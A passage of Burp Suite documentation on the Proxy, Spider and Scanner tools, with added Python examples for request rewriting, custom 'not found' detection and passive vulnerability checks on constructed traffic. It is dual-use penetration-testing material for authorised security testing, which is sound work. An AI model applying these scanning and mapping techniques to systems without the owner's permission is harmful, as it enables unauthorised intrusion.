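    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def serialize(request_line, headers, body: bytes) -> bytes:
    head = "\r\n".join([request_line] + [f"{n}: {v}" for n, v in headers])
    return head.encode("iso-8859-1") + b"\r\n\r\n" + body


def destination(request_line, headers, invisible_proxying=False):
    """Return (host, port) to forward to. A proxy-style request carries
    the absolute URL in its first line and is routed from that alone. A
    non-proxy-style request only has a path, so the Host header is the
    only clue, and it is consulted only when invisible proxying is on."""
    _method, target, _version = request_line.split(" ", 2)
    if target.startswith(("http://", "https://")):
        parts = urlsplit(target)
        return parts.hostname, parts.port or (443 if parts.scheme == "https" else 80)
    if not invisible_proxying:
        raise ValueError("non-proxy-style request; invisible proxying is off")
    hosts = [v for n, v in headers if n.lower() == "host"]
    if not hosts:
        raise ValueError("non-proxy-style request without a Host header")
    host, _, port = hosts[0].partition(":")
    return host, (int(port) if port else 80)   # plaintext listener assumed


def apply_header_rules(headers, rules):
    """rules: list of (regex, replacement) applied to each 'Name: value'
    line. A regex matching the entire header with a blank replacement
    deletes the header; a blank regex adds the replacement as a new
    header; anything else is an in-place substitution."""
    out = []
    for name, value in headers:
        line = f"{name}: {value}"
        deleted = False
        for pattern, replacement in rules:
            if pattern == "":
                continue
            if re.fullmatch(pattern, line) and replacement == "":
                deleted = True
                break
            line = re.sub(pattern, replacement, line, count=1)
        if not deleted:
            n, _, v = line.partition(":")
            out.append((n.strip(), v.strip()))
    for pattern, replacement in rules:
        if pattern == "" and replacement:
            n, _, v = replacement.partition(":")
            out.append((n.strip(), v.strip()))
    return out


def update_content_length(headers, body: bytes):
    """Set Content-Length to the real body size, as the "update
    Content-Length" option does. A header is added only if one already
    existed or the message now carries a body."""
    out, seen = [], False
    for name, value in headers:
        if name.lower() == "content-length":
            if not seen:
                out.append((name, str(len(body))))
                seen = True
        else:
            out.append((name, value))
    if not seen and body:
        out.append(("Content-Length", str(len(body))))
    return out


def rewrite(raw: bytes, rules, new_body=None, invisible_proxying=False):
    """Full pass: route first (from the original Host), then rewrite
    headers, optionally swap the body, and fix Content-Length."""
    request_line, headers, body = parse_request(raw)
    host, port = destination(request_line, headers, invisible_proxying)
    headers = apply_header_rules(headers, rules)
    if new_body is not None:
        body = new_body
    headers = update_content_length(headers, body)
    return (host, port), serialize(request_line, headers, body)


# Constructed samples mirroring the two request shapes shown in the text.
PROXY_STYLE = b"GET http://myapp.com/foo.php HTTP/1.1\r\nHost: myapp.com\r\n\r\n"
NON_PROXY = b"GET /foo.php HTTP/1.1\r\nHost: myapp.com\r\n\r\n"
POST = (b"POST /login HTTP/1.1\r\nHost: myapp.com\r\nAccept-Encoding: gzip\r\n"
        b"Content-Length: 3\r\n\r\na=1")

if __name__ == "__main__":
    rules = [(r"^Host: .*$", "Host: internal.example"),  # rewrite Host (redirect case)
             (r"^Accept-Encoding: .*$", ""),            # delete the whole header
             ("", "X-Proxied-By: example")]             # add a new header
    print(rewrite(POST, rules, new_body=b"a=12345", invisible_proxying=True))
```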

talk HTTP/1.0 to server - This controls whether Burp Proxy enforces HTTP version 1.0 communications with the target server. The default setting is to use whichever version of HTTP is used by the browser. Burp Proxy has been tested successfully with most common web servers using both versions 1.0 and 1.1. However some legacy servers or applications may require version 1.0 in order to function correctly, and so this can be specified here.

unpack gzip / deflate - Some browsers accept gzip- and deflate-compressed content from servers. In order to view or modify this content, it needs to be unpacked into uncompressed form. This option controls whether Burp Proxy performs this unpacking automatically.

History tab

This tab displays details of all requests made, and shows the target server and port number, the HTTP method, the URL, whether the request contains parameters or was manually modified, the HTTP status code of the response, the response size in bytes, the MIME type of the response, the file type of the requested resource, the title of the HTML page, whether SSL was used, the remote IP address, any cookies set by the server, and the time of the request. This tab is useful when you have interception turned off, as it allows you to browse without interruption whilst still monitoring key details about application traffic.

You can click on any column heading in the history table to sort the table according to the contents of that column (or shift-click the column to reverse-sort). For example, if you prefer your history table to grow "upwards", with the most recent items at the top of the table, then you can shift-click the leftmost column showing the request number. Alternatively, if you want to group all of the requested items according to their content type, you can click the "MIME type" column.

Below the history table is a preview pane. If you select an item from the history, the relevant request and response (if received) will be displayed in the lower pane. If the request or response was modified, either manually or through any rules that you have configured, then the modified items will also be shown alongside the originals.

Right-clicking on one or more items in the history table will show a context menu enabling you to perform various actions, including modifying the target scope, sending the items to other Burp tools, or deleting the items from the history.

[Pro version] You can use the context menu to access various engagement tools, such as searching for comments and scripts, analysing your target web site, scheduling tasks, etc.

You can annotate individual or multiple items, by adding comments and highlights. You can highlight individual items using a drop-down menu on the left-most table column, and you can comment individual items in-place by double-clicking and editing the table cell. Alternatively, if you want to annotate several items at once, select the relevant items and use the context menu to add comments or apply highlights.

When you have annotated interesting requests, you can use column sorting and display filters to quickly find these items later. In addition to viewing request details in the preview pane, you can also double-click on any item in the table to show the request and response in a pop-up window.

The content displayed within the history table is effectively a view into an underlying database, and you can configure filters to determine which items of underlying data are displayed within the table. Some applications contain a large amount of content like images, CSS, etc., which it is normally helpful to hide from view. AJAX applications often generate large numbers of very similar asynchronous requests which you may want to filter from view to see the more interesting items. At the top of the history table, there is a filter bar. Clicking on this shows a popup enabling you to configure exactly what content will be displayed within the table. You can choose to display only requests with parameters, or which are within the current target scope, or for which a response has been received. You can filter by MIME type, HTTP status code and file extension. If you set a filter to hide some items, these are not deleted, only hidden, and will reappear if you unset the relevant filter.

[Pro version] You can also specify a search term to filter on, which will only show items containing that expression in the request or response, or within the user-added comment if applicable.

As well as filtering, you can also permanently delete items from the history, by selecting one or more items in the history table, and choosing "delete" from the context menu.

In some situations, it can be useful to display more than one view into the underlying history data, and apply different filters to each view. For example, when testing access controls, you may log into an application in different user contexts, and want to review separately the different sequences of requests that occur in each user context. You can open additional views of the proxy history by selecting the "show new history window" option from the proxy history context menu. You can then configure the display filter for each history window to show the requests that you want to see.

To use this feature to help test access controls, you need to use a separate browser for each user context you are testing, and create a separate proxy listener in Burp for use by each browser (you will need to update your proxy configuration in each browser to point to the relevant listener). For each browser, you can then open a separate proxy history window in Burp, and set the filter to show only requests from the relevant proxy listener port. As you use the application in each browser, each history window will show only the items for the associated user context.

In-browser controls

In addition to the main interface, you can control Burp Proxy directly from within your browser.

The full proxy history can be accessed by visiting http://burp with your browser. The history is displayed in a table which shows the target server and port number, the HTTP method, the URL, the file extension, and whether or not the request was modified. Clicking on an entry in the "URL" column displays the original request. Clicking on an entry in the "modified?" column displays the relevant modified request. When an individual request is displayed in full, the request can be reissued by clicking the "repeat request" button. Depending on the currently configured interception rules (see Options tab), the request may be displayed within Burp Proxy for modification. When the browser receives the server's response to the re-issued request, onward browsing can continue as normal.

If available, you can also view the original response within your browser by clicking the "view response" button. This causes Burp Proxy to return the exact response originally received from the server, and neither the request nor response will be displayed within Burp Proxy for modification. Note that when the browser receives the saved response from Burp Proxy, this may cause the browser to launch additional requests (e.g. for embedded images). These new requests will be handled by Burp Proxy in the normal way, and will not be returned from any previously saved data.

Extensibility

Burp Proxy is extensible via the IBurpExtender interface. This allows third-party developers to extend the functionality of Burp Suite by creating implementations of the interface which will be dynamically loaded and executed. The processProxyMessage() method of this interface allows implementations to receive full details of every request and response, to perform logging functions, modify the message, specify an action (intercept, drop, etc) and perform any other arbitrary processing. See the source code and Javadoc for the interface for more details.

What is Burp Spider?

Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application's content and functionality.

Burp Spider maps a target application by following hyperlinks found within HTML and JavaScript, submitting forms, and using other clues such as directory listings, source code comments and the robots.txt file. Results are displayed in the target site map in both tree and table format, providing a clear and highly detailed view of the target application.

Burp Spider enables you to obtain a detailed understanding of how a web application works, avoiding the time-consuming and unreliable task of manually following links, submitting forms and scouring HTML source code. Potentially vulnerable application functions can be quickly identified, allowing you to check for specific vulnerabilities such as SQL injection and directory traversal.

Using Burp Spider

To use Burp Spider against an application requires two simple steps:

1. With your browser configured to use Burp Proxy as its proxy server, browse to the target application. (You can turn off interception within the Proxy, to save time.)
2. Go to the site map in the "target" tab, and select the host(s) and directories where the target application resides. Choose the "spider this host/branch" option from the context menu. You can also choose "spider this item" from the context menu on any request or response within any of the Burp tools.

When you send a branch of the site map for spidering, the Spider will first check if that branch is within the currently defined spidering scope. If not, Burp will prompt you to confirm that you want to add the relevant URLs to the scope. Burp will then start spidering, and will perform the following actions:

 Request any unrequested URLs already discovered within the branch.
 Submit any discovered forms whose action URLs lie within the branch.
 Re-request any items in the branch which previously returned 304 status codes, to retrieve a fresh (uncached) copy of the application's responses.
 Parse all content retrieved to identify new URLs and forms.
 Recursively repeat these steps as new content is discovered.
 Continue spidering all in-scope areas until no new content is discovered.

Note that the Spider will follow links for any URLs that are within the currently defined spidering scope. If you have already defined a wider target scope, and you select an individual branch within this for spidering, then the Spider will follow any links into the wider target scope, and so will spider outside of the selected branch. To ensure that the Spider only requests items within a specific branch, you should first configure the spidering scope to include only this branch.

You should use Burp Spider with caution. In its default configuration, the Spider will automatically submit any forms within the spidering scope using default input values, and will request various URLs that normal users would not ordinarily request if using only a browser. If any URLs within your defined scope are used to perform sensitive actions, then these actions may actually be carried out within the application. It is normally preferable to perform some manual mapping of the application using your browser before initiating any fully automated content discovery.

Control tab

This tab is used to start and stop Burp Spider, monitor its progress, and define the spidering scope.

Spider running - This is used to start and stop the Spider. While the Spider is stopped it will not make any requests of its own, although it will continue to process responses generated via Burp Proxy, and any newly-discovered items that are within the spidering scope will be queued to be requested if the Spider is restarted. The display also shows some metrics about the Spider's progress, enabling you to see the size of the in-scope content and the work remaining to fully spider it.

Clear queues - If you want to reprioritise your work, you can completely clear the currently queued items, so that other items can be added to the queue. Note that the cleared items may be re-queued if they remain in-scope and the Spider's parser encounters new links to the items.

Spider scope - This panel lets you define exactly what is in-scope for the Spider to request. If you have already configured the Suite-wide target scope with details of your current target, then you can normally leave the default setting, which is to use the Suite-wide scope to define the Spider's activities. If you need to define a different scope for the Spider to use, then select "use custom scope". A further configuration panel will appear which functions in the same way as the Suite-wide scope panel. If you have selected to use a custom scope and you send any out-of-scope items to the Spider, then Burp will automatically update this custom scope, rather than the Suite scope.

Options tab

This tab contains various configuration options which control the behaviour of Burp Spider, as described below. These settings can be modified after the Spider has started running, and will be applied retrospectively to prior results. For example, if the maximum link depth is increased, then links which were previously outside the maximum depth will be queued to be requested if appropriate.

check robots.txt - If checked, Burp Spider will request and process the robots.txt file from all in-scope domains. This file is used by the robots exclusion protocol to control the behaviour of spider-like agents on the Internet. Note that Burp Spider does not conform to the robots exclusion protocol. Because Burp Spider is designed to comprehensively enumerate a target application's content, all entries in robots.txt will be requested if they are in-scope.

use cookies - If checked, Burp Spider will process Set-Cookie instructions in server responses, and will submit any received cookies in subsequent requests to the same domain. This option is normally necessary when spidering web applications which persist any kind of state in a server-side session.

detect custom "not found" responses - The HTTP protocol requires web servers to return a 404 status code if a requested resource is not found. However, many web applications return customised "not found" pages that use a different status code. If this is the case, then using this option can prevent false positives in the mapping of site content. Burp Spider detects custom "not found" responses by requesting several nonexistent resources from each domain, and compiling a fingerprint with which to diagnose "not found" responses to other requests.

ignore links to non-text content - It is often possible to deduce the MIME type of a particular resource from the HTML context in which links to it appear. For example, URLs within IMG tags will probably return images; those within SCRIPT tags will probably return JavaScript. If this option is checked, the Spider will not request items which appear, from this context, to be non-text media resources. Using this option can reduce spidering time with minimal risk of overlooking interesting content as a result.

request the root of all directories - If checked, Burp Spider will request all identified web directories within the target scope, in addition to files within those directories. This option is particularly useful if directory indexing is available on the target site.

make a non-parameterised request to each dynamic page - If checked, Burp Spider will make a non-parameterised GET request to all in-scope form action URLs. Dynamic pages usually respond differently if the expected parameters are not received, and this option may successfully detect additional site content and functionality.

maximum link depth - This is the maximum number of "hops" which Burp Spider will navigate from any seed URL. A value of zero will cause Burp Spider to request seed URLs only. If a very large number is specified, then in-scope links will be followed effectively indefinitely.

The following options control the interface between Burp Proxy and Burp Spider, which allows "passive" spidering of web applications, controlled through your browser.

passively spider as you browse - If checked, Burp Spider will process all HTTP requests made through Burp Proxy, to identify links and forms on web pages visited. Using this option can enable Burp Spider to build up a detailed picture of an application's contents even when you have only browsed a subset of that content with your browser, because all content that is linked from visited content is automatically added to the Suite site map.

link depth to associate with proxy requests - This option controls the "link depth" which will be associated with web pages accessed through Burp Proxy. To prevent Burp Spider following any links in these pages (even when the Spider is running and these links are in-scope) set a higher value for this option than the "maximum link depth" option above.
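The "detect custom not found responses" technique described above, as an added example that is not Burp's own code: several resources that cannot exist are requested, the responses are normalised (echoed path, request ids and whitespace removed) and hashed into a fingerprint, and later responses matching that fingerprint are treated as "not found" even when the status code is 200. The sample server is constructed for the demonstration.

```python
"""Fingerprinting a custom "not found" page (added example, not Burp's code).
The constructed sample server answers unknown paths with status 200 and an
error page that echoes the path and a per-request id, so a status-code
check alone would report every guessed resource as present."""
import hashlib
import re
import secrets

# Constructed content of a fictional application.
KNOWN_PAGES = {
    "/": "<html><body><h1>Welcome</h1><a href='/about'>About</a></body></html>",
    "/about": "<html><body><h1>About us</h1><p>Founded 2012.</p></body></html>",
}


def sample_server(path):
    """Constructed stand-in for an HTTP fetch: returns (status, body)."""
    if path in KNOWN_PAGES:
        return 200, KNOWN_PAGES[path]
    return 200, ("<html><body><h1>Oops!</h1><p>The page %s could not be found.</p>"
                 "<p>Request id: %s</p></body></html>" % (path, secrets.token_hex(4)))


def normalise(body, path):
    """Strip per-request variability so that structurally identical error
    pages hash to the same value: the echoed path, long hex tokens (request
    ids, nonces) and whitespace differences."""
    body = body.replace(path, "{PATH}")
    body = re.sub(r"[0-9a-fA-F]{6,}", "#", body)
    return re.sub(r"\s+", " ", body).strip()


def fingerprint(status, body, path):
    """(status code, hash of the normalised body) identifies a page template."""
    digest = hashlib.sha256(normalise(body, path).encode()).hexdigest()
    return (status, digest)


def learn_not_found(fetch, probes=3):
    """Request several resources that cannot exist and record how the
    application answers. Returns the shared fingerprint, or None when the
    responses disagree (no stable 'not found' page could be learnt)."""
    seen = set()
    for _ in range(probes):
        path = "/" + secrets.token_hex(8)   # 16 random hex chars: will not exist
        status, body = fetch(path)
        seen.add(fingerprint(status, body, path))
    return seen.pop() if len(seen) == 1 else None


def resource_exists(fetch, path, not_found_fp):
    """A real 404, or a match against the learnt custom 'not found'
    fingerprint, means the resource is absent."""
    status, body = fetch(path)
    if status == 404:
        return False
    return fingerprint(status, body, path) != not_found_fp


if __name__ == "__main__":
    fp = learn_not_found(sample_server)
    for candidate in ["/about", "/admin", "/backup.zip"]:
        state = "exists" if resource_exists(sample_server, candidate, fp) else "not found"
        print(candidate, state)
```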

Note: Earlier versions of Burp Spider contained options here to control how the Spider cookie jar was updated based on cookies in Proxy requests and responses. These configurations have now been removed, and you should use the suite-wide session handling support instead.

individuate forms - This option configures the criteria for individuating unique forms (action URL, method, fields, values). When Burp Spider processes each form, it will check these criteria to determine if the form is "new". Forms which are not new will not be queued for submission.

do not submit - If selected, Burp Spider will not submit any forms.

prompt for guidance - If selected, Burp Spider will prompt you for guidance before submitting each identified form. This allows you to enter custom data into form input fields as required, and choose which submit fields to send to the server, or whether to iterate through all submit fields.

automatically submit - If selected, Burp Spider will automatically submit any in-scope forms using the defined rules to fill out the values of text input fields. Each rule lets you specify a simple or regular expression to match on form field names, and the value to submit in fields whose names match the expression. A default value can be specified for any unmatched fields. This option is particularly useful if you want to automatically spider through registration forms and similar functions, where applications typically require data in a valid format for each input field. Burp comes with a set of default rules that have proven successful when automatically submitting form data to a wide range of applications. Of course, you can modify these or add your own rules if you encounter form field names that you want to submit specific values in. You should use this option with caution, as submitting bogus values in forms may sometimes result in undesirable actions.

Many forms contain multiple SUBMIT elements, which result in different actions within the application, and the discovery of different content. You can configure the Spider to iterate through the values of all submit elements within forms, submitting each form multiple times up to a configurable maximum.

Login forms play a particular role within applications, and you will often want Burp to handle these in a different way than ordinary forms. Using this configuration, you can tell the Spider to perform one of four different actions when a login form is encountered:

- Burp can ignore the login form, if you don't have credentials, or are concerned about spidering sensitive protected functionality.
- Burp can prompt you for guidance interactively, enabling you to specify credentials on a case-by-case basis. This is the default option.
- Burp can handle login forms in the same way as any other form, using the configuration and auto-fill rules you have configured for those.
- Burp can automatically submit specific credentials in every login form that is encountered.

In the last case, any time Burp encounters a form containing a password field, it will submit your configured password in that field, and will submit your configured username in the text input field whose name most looks like a username field. If you have credentials for an application, and want to let the Spider handle the login for you, then this is normally the best option.

These options let you fine-tune the spidering engine, depending on the performance impact on the application, and on your own processing power and bandwidth. If you find that the Spider is running slowly, but the application is performing well and your own CPU utilisation is low, you can increase the number of scan threads to make your scans proceed faster. If you find that connection errors are occurring, that the application is slowing down, or that your own computer is locking up, you should reduce the thread count, and maybe increase the number of retries on network failure and the pause between retries.

Request headers - This section allows customised HTTP headers to be configured which will be used in all requests. This may be useful to meet specific requirements of individual applications - e.g. to emulate an expected user agent when testing applications designed for mobile devices.

use Referer header - If checked, Burp Spider will submit the relevant Referer header when requesting any item that was linked to from another page.

Spider results

All of the content discovered during spidering is added to the target site map that is shared between Suite components. This map shows tree and table views of the content discovered via the Spider and Proxy. It lets you filter from view any items you are not interested in, and perform numerous other actions such as initiating vulnerability scans and further spidering, and sending individual requests to other Burp tools to perform customised attacks. Please consult the site map help for further details.

What is Burp Scanner?

Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

Using most web scanners is a detached exercise: you provide a start URL, click "go", and watch a progress bar update until the scan is finished and a report is produced. Using Burp Scanner is very different, and is much more tightly integrated with the actions you are already carrying out when attacking an application, giving you fine-grained control over each request that gets scanned, and direct feedback about the results.

Burp Scanner can perform two types of scans:

- Active scanning - The scanner sends various crafted requests to the application, derived from a base request, and analyses the resulting responses looking for vulnerable behaviour.
- Passive scanning - The scanner doesn't send any new requests of its own; it merely analyses the contents of existing requests and responses, and deduces vulnerabilities from those.

You can initiate scans against your target application in two different ways:

- Manual scanning - You can send one or more requests from other Burp tools, to perform active or passive scans against those specific requests.
- Live scanning as you browse - You can configure the Scanner to automatically perform active or passive scans against requests passing through the Proxy as you are browsing the application.

This approach to automated vulnerability detection brings a number of benefits to the penetration tester:

- Being able to perform quick and reliable scans for many common vulnerabilities on a per-request basis can hugely reduce your testing effort, enabling you to direct your human expertise towards vulnerabilities whose detection cannot be reliably automated.
- Results from each type of scan are displayed immediately, and can directly inform your other testing actions in relation to the individual requests involved.
- Burp avoids a frustrating problem with other scanners, in which a monolithic automated scan takes an age to complete, with little assurance over whether the scan has worked, or whether it encountered problems that impacted on its effectiveness.

By controlling exactly what gets scanned, and by monitoring in real time both the scan results and the wider effects on the application, Burp Scanner lets you combine the virtues of reliable automation with intuitive human intelligence, often with devastating results.

Active scanning

In this mode of scanning, Burp takes an individual request to the application, called the "base request", and modifies it in various ways designed to trigger behaviour that indicates the presence of various vulnerabilities. These modified requests are sent to the application, and the resulting responses are analysed. In many cases, further requests will be sent, based on the results of the initial probes.

This mode of operation generates large numbers of requests which are malicious in form and which may result in compromise of the application. You should use this scanning mode with caution, only with the explicit permission of the application owner, and having warned them of the possible effects which automated scanning may have on the application and its data. If possible, scanning should be performed against non-production systems, and full backups performed prior to scanning.

There are various well-known limitations on the types of vulnerabilities within web applications whose detection can be reliably automated. Burp's active scanning capabilities were designed to focus on the kind of input-based bugs that scanners can reliably look for. By avoiding the false positives that arise in other areas, Burp gives you confidence in its output, leaving you to focus on the aspects of the job that require human experience and intelligence to deliver.

The issues that Burp's active scanning is able to identify mostly fall into two categories:

1. Input-based vulnerabilities targeting the client side, such as cross-site scripting, HTTP header injection, and open redirection.
2. Input-based vulnerabilities targeting the server side, such as SQL injection, OS command injection, and file path traversal.

Issues in category 1 can be detected with a very high degree of reliability. In most cases, everything that is relevant to finding the bug is visible on the client side. For example, to detect reflected XSS, Burp Scanner submits some benign input in each entry point to the application, and looks for this being echoed in responses. If it is echoed, Burp then parses the response content to determine the context(s) in which the echoed input appears. It then supplies various modified inputs to determine whether strings that constitute an attack in those contexts are also echoed. Burp Scanner has knowledge of the wide range of broken input filters, and associated bypasses, that arise with web applications, and it checks for all that apply to the context. By implementing a full decision tree of checks, driven by feedback from preceding checks, Burp effectively emulates the actions that a skilled and methodical human tester would perform. The only bugs that Burp should miss are those with some unusual feature requiring intelligence to understand, such as a custom scheme for encapsulating inputs.

Issues in category 2 are inherently less amenable to automated detection, because in many cases the behaviours that are relevant to identifying the bugs occur only on the server, with little manifestation on the client side. For example, SQL injection bugs may return verbose database errors in responses, or they may be fully blind. Burp Scanner employs various techniques to identify blind server-side injection issues, by inducing time delays, changing Boolean conditions and performing fuzzy response diffing, etc. These techniques are inherently more error prone than the methods that are available in category 1. Nevertheless, Burp Scanner achieves a high success rate in this area, reliably reporting numerous kinds of issue that are difficult or laborious for a human tester to diagnose.

Passive scanning

In this mode of scanning, Burp doesn't send any new requests to the application - it merely analyses the contents of existing requests and responses, and deduces vulnerabilities from those. This mode of operation can be used safely and legally in any situation in which you are authorised to access the application.

Burp Scanner is able to identify numerous kinds of vulnerabilities using solely passive techniques, including:

- Clear-text submission of passwords.
- Insecure cookie attributes, like missing HttpOnly and secure flags.
- Liberal cookie scope.
- Cross-domain script includes and Referer leakage.
- Forms with autocomplete enabled.
- Caching of SSL-protected content.
- Directory listings.
- Submitted passwords returned in later responses.
- Insecure transmission of session tokens.
- Leakage of information like internal IP addresses, email addresses, stack traces, etc.
- Insecure ViewState configuration.
- Ambiguous, incomplete, incorrect or non-standard Content-type directives.
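A handful of the passive checks listed above, as an added example that is not Burp's own code: each check only inspects an already-captured request and its response and sends nothing, which is what makes this mode safe against production systems. The request/response pair and the header layout (a dict with `Set-Cookie` held as a list) are constructed for the demonstration.

```python
"""Passive checks over captured HTTP traffic (added example, not Burp's code).
Each check receives one request and its response as plain dicts and returns
a list of finding strings; no request is ever sent."""
import re
from urllib.parse import urlsplit, parse_qs

PRIVATE_IP = re.compile(r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
                        r"|192\.168\.\d{1,3}\.\d{1,3}"
                        r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b")
PASSWORD_PARAM = re.compile(r"pass(word|wd)?|pwd", re.I)
JAVA_TRACE = re.compile(r"\bat [\w.$]+\(\w+\.java:\d+\)")


def check_cleartext_password(req, resp):
    """Clear-text submission of passwords: a password-looking parameter in a
    request body sent over plain http."""
    if urlsplit(req["url"]).scheme != "https":
        if any(PASSWORD_PARAM.search(n) for n in parse_qs(req.get("body", ""))):
            return ["Clear-text submission of password"]
    return []


def check_cookie_flags(req, resp):
    """Insecure cookie attributes: Set-Cookie without HttpOnly, or without
    Secure when the cookie was set over https."""
    findings = []
    for value in resp["headers"].get("Set-Cookie", []):
        name = value.split("=", 1)[0]
        attrs = {a.strip().split("=")[0].lower() for a in value.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append("Cookie without HttpOnly flag: " + name)
        if "secure" not in attrs and urlsplit(req["url"]).scheme == "https":
            findings.append("Cookie without Secure flag: " + name)
    return findings


def check_autocomplete(req, resp):
    """Forms with autocomplete enabled: a password input inside a form that
    does not switch autocomplete off."""
    findings = []
    for form in re.findall(r"<form\b[^>]*>.*?</form>", resp.get("body", ""), re.S | re.I):
        if (re.search(r"<input\b[^>]*type=['\"]?password", form, re.I)
                and not re.search(r"autocomplete=['\"]?off", form, re.I)):
            findings.append("Password field with autocomplete enabled")
    return findings


def check_directory_listing(req, resp):
    if re.search(r"<title>Index of /", resp.get("body", ""), re.I):
        return ["Directory listing"]
    return []


def check_info_leak(req, resp):
    """Leakage of internal IP addresses and stack traces in body or headers."""
    pieces = [resp.get("body", "")]
    for value in resp["headers"].values():
        pieces.extend(value if isinstance(value, list) else [value])
    text = " ".join(pieces)
    findings = ["Private IP address disclosed: " + ip
                for ip in sorted(set(PRIVATE_IP.findall(text)))]
    if JAVA_TRACE.search(text):
        findings.append("Java stack trace disclosed")
    return findings


CHECKS = [check_cleartext_password, check_cookie_flags, check_autocomplete,
          check_directory_listing, check_info_leak]


def passive_scan(req, resp):
    """Run every passive check over one request/response pair."""
    findings = []
    for check in CHECKS:
        findings.extend(check(req, resp))
    return findings


# Constructed sample traffic for a fictional login page.
SAMPLE_REQUEST = {
    "method": "POST",
    "url": "http://www.example.test/login",
    "headers": {"Content-Type": "application/x-www-form-urlencoded"},
    "body": "username=alice&password=hunter2",
}
SAMPLE_RESPONSE = {
    "status": 200,
    "headers": {
        "Server": "Apache",
        "X-Backend": "10.0.3.7",
        "Set-Cookie": ["JSESSIONID=abc123; Path=/", "prefs=dark; Path=/; HttpOnly"],
    },
    "body": ("<html><form action='/login' method='post'><input name='username'>"
             "<input type='password' name='password'></form></html>"),
}

if __name__ == "__main__":
    for finding in passive_scan(SAMPLE_REQUEST, SAMPLE_RESPONSE):
        print(finding)
```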

Many of these issues are relatively unexciting, and recording them is dull and repetitive for a human. But as penetration testers we are obliged to report them. Having Burp Scanner reliably mop up these issues as you browse an application is a time and sanity saver.

Being able to carry out passive-only vulnerability scanning is beneficial in a range of situations:

- Because passive scans don't send any new requests to the application, you can perform them safely against critical production applications where you want total control of every request that you send.
- Some applications are aggressive in reacting to attacks, by terminating your session or locking your account every time an apparently malicious request is received. In this situation, you may be restricted to piecemeal manual testing, but you can still use passive scanning to identify various kinds of issues without causing any problems.
- If you don't (yet) have authorisation to attack a target, you can use passive scanning to identify vulnerabilities purely by browsing the application as a normal user. For example, if you are proposing for a new penetration testing engagement, you can passively scan your target to get a feel for its security posture, and hopefully get some reportable issues in the bag before you even begin the official testing.

Initiating scans

Manual scanning

From anywhere within Burp Suite, you can select one or more HTTP requests, and send these to the Scanner to perform active or passive scanning. For example, if you intercept an interesting request using Burp Proxy, you can initiate a scan against just this request using the context menu.

Similarly, you can select sets of requests from within the Target site map or Proxy history, and send these in bulk to the Scanner. So, after browsing around an application and building up a comprehensive map of its content, you can tell Burp to scan specific areas of the application's functionality.

If you select multiple items and send these for active scanning, Burp launches a brief wizard which lets you fine-tune your selection. The first screen of the wizard offers you various intuitive filters to remove potentially unnecessary items (duplicates, already scanned items, media content, etc.), and shows you how many items will be affected by each filter. The second screen of the wizard shows you a list of the remaining items, and lets you sort the table by various relevant properties, view the full requests and responses, and delete individual items. The wizard then completes and the selected items are sent for scanning in the usual way.

Live scanning

A further way to initiate scans is to use the "live scanning" feature. In this mode, you tell Burp what your target scope is for active and passive scanning, and it will automatically initiate active or passive scans against relevant requests as you use the application. When operating in this mode, you simply need to browse around the application as a normal user, to show Burp where the application's content and functionality are, and it will work away in the background to find vulnerabilities for you.

When using live scanning, you have fine-grained control over the requests that Burp will automatically scan. If you have already configured a suite-wide target scope for your current work, then you can simply tell Burp to scan every request that falls within that scope. Alternatively, you can define a custom scope to use for active and passive scanning. In the example below, Burp has been configured to actively scan every request that is made to www.myapp.com, with the exception of login requests, and to passively scan every request that is made to any destination whatsoever.

Note that the live scanning feature ignores requests for media resources (images, etc.) where the request does not contain any non-cookie parameters. Requests like these are virtually always for static resources which do not have any security significance, and so can be safely ignored by the scanner. (This does not apply to manual scanning - if you manually select items like these and send them for active scanning, then they will of course be scanned in the normal way.)

Active scan queue

When you send requests for passive scanning, these are processed immediately. Because active scans involve sending large numbers of requests to the server, requests sent for active scanning may be queued up. A typical request with a dozen parameters will be scanned in a minute or two, and the scan queue is processed by a configurable thread pool, so the number of waiting items rarely grows very large.

As each item is scanned, the scan queue table indicates its progress - the number of requests made, the percentage complete, and the number of vulnerabilities identified. This last value is colourised according to the significance and confidence attached to the most serious issue. You can double-click any item in the scan queue to display the issues identified so far, and view the base request and response for that item. You can use the context menu on the scan queue to perform various actions:

- Show the details of the selected item.
- Cancel the selected item(s).
- Scan the selected item(s) again.
- Pause or resume the scanner.

Used in the ways described, Burp Scanner gives you fine-grained control over everything that it does, and integrates closely with your other testing activities. It lets you prioritise areas of an application that interest you, by browsing them using live scanning, or selecting them for scanning from the site map. And it provides immediate feedback about those areas to inform your manual testing actions.

Reviewing results

In addition to the per-request view of discovered issues shown above, Burp Scanner maintains a central record of all the issues it has discovered, organised in a tree view of the target application's site map. Selecting a host or folder in the tree shows a listing of all the issues identified for that branch of the site. Where multiple issues have been found of the same type, these are aggregated into a single item in the top-right panel. You can expand the aggregated item to view each individual instance of the issue. Selecting an issue in the top-right panel shows the full detail for that issue in the bottom-right panel. This includes a customised vulnerability advisory, and the full requests and responses that are relevant to understanding and reproducing the issue.

The advisory includes a standard description of the issue and its remediation, and also a description of any specific features that apply to the issue and affect its remediation. In the example above, the cross-site scripting advisory tells us:

- The request parameter in which the attack input is supplied (SearchTerm).
- The syntactic context in which the input is returned in the response (within a piece of JavaScript, in a single-quote-delimited string).
- That the application escapes any single quote characters in our input, but fails to escape the backslash, allowing us to circumvent the filter.
- The exact proof-of-concept payload which Burp submitted to the application, and the form in which this payload was returned.
- That the original request used the POST method, and Burp was able to convert this to a GET request to facilitate demonstration and exploitation of the issue.

Every issue that Burp Scanner reports is given a rating both for severity (high, medium, low, informational) and for confidence (certain, firm, tentative). When an issue has been identified using a less reliable technique, Burp makes you aware of this, by dropping the confidence level.

Alongside the advisory, Burp shows the requests and responses that were used to identify the issue, with relevant portions highlighted. You can review these to see how Burp identified the issue, and quickly understand the nature of the vulnerability. You can also send the request directly to other tools to manually verify the issue, or fine-tune the proof-of-concept attack that was generated by Burp.

Within the list of scan issues, you can modify the severity and confidence levels of individual or multiple issues (via the context menu), or delete issues altogether (via the context menu or using the 'del' key).

